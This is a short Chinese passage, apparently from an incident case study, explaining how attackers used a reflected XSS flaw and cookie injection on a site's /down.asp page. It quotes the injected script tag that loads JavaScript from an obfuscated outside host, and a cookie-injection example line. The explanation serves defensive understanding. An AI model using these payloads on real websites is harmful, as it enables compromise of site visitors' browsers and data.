攻击者的手法

　　很快，小任就得到了启明星辰工程师的反馈信息，在网站的/down.asp页面下，存在一个反射式的XSS漏洞，骇客就是利用这个漏洞，通过cookie 注入的方式，将恶意脚本“<Script Src=http://c.nu%63%6Cear3.com/css/c.js></script> ”注入到每一个网站链接中，以达到危害用户的目的。

　　小知识：什么叫反射式XSS？

　　Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中。

　　在这个例子里，骇客将恶意脚本嵌入URL，网站访问者一旦点击这个链接，浏览器将认为恶意代码是来自网站，从而“放心”的执行。

　　小知识：cookie注入

　　Cookie注入是SQL注入攻击的一种表现形式，是系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量没有过滤,而且在防注入程序中没有限制Request.cookie所导致的。

　　一个典型的例子就是javascript:alert(document.cookie="id="+escape(XX and "attack string")。